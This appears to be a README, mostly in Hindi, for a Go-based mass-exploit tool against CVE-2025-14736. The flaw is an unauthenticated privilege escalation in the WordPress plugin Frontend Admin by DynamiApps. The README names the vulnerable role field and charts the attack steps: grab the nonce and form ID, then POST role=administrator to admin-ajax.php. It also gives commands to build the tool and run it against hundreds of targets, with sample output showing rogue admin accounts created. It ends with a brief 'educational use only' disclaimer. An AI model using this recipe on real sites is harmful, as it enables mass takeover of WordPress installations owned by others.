
भूमिका फॉर्म फ़ील्ड के माध्यम से बिना प्रमाणीकरण के प्रशासक तक विशेषाधिकार वृद्धि
लेखक: Hyun Chiya
| क्षेत्र | मान |
|---|---|
| CVE आईडी | CVE-2025-14736 |
| प्लगइन | Frontend Admin by DynamiApps |
| प्रभावित संस्करण | <= 3.28.25 |
| भेद्यता प्रकार | अप्रमाणित विशेषाधिकार वृद्धि |
| गंभीरता | गंभीर |
WordPress के लिए Frontend Admin प्लगइन, पंजीकरण के दौरान उपयोगकर्ता-नियंत्रित फ़ील्ड पर अपर्याप्त सत्यापन के कारण अप्रमाणित विशेषाधिकार वृद्धि के लिए संवेदनशील है। हमलावर फ़ॉर्म सबमिशन पेलोड में हेरफेर करके administrator सहित मनमानी भूमिकाएँ इंजेक्ट कर सकते हैं।
संवेदनशील तर्क फ़ॉर्म सबमिशन के हैंडलिंग में निहित है जहां role फ़ील्ड को उपयोगकर्ता इनपुट से विश्वसनीय माना जाता है, बिना यह सत्यापित किए कि उपयोगकर्ता उस भूमिका को निर्दिष्ट करने के लिए अधिकृत है या नहीं। विशेष रूप से, फ़ील्ड acff[user][field_user_role_ID] को administrator में संशोधित किया जा सकता है।
flowchart TD
A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
B --> C["Construct POST payload with 'role'='administrator'"]
C --> D["POST to /wp-admin/admin-ajax.php"]
D --> E{"Verification"}
E -->|Success| F["New Admin User Created"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fffgo build -o mass_exploit.exe mass_exploit.go
.\mass_exploit.exe -l list.txt -t 50
| तर्क | विवरण |
|---|---|
-l | लक्ष्य URL की सूची का पथ (डिफ़ॉल्ट: list.txt) |
-t | समवर्ती थ्रेड्स की संख्या (डिफ़ॉल्ट: 10) |
-timeout | अनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 15) |
>> [ ONLINE ]
╔═══════════════════════════════════════════════════════════════════════════════════════╗
║ CVE-2025-14736 - Mass Exploit Tool ║
║ Frontend Admin by DynamiApps Privilege Escalation ║
║ Author: Hyun Chiya ║
╚═══════════════════════════════════════════════════════════════════════════════════════╝
>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...
[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32
[*] Scan complete.
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। जिम्मेदारी से उपयोग करें।
Hyun Chiya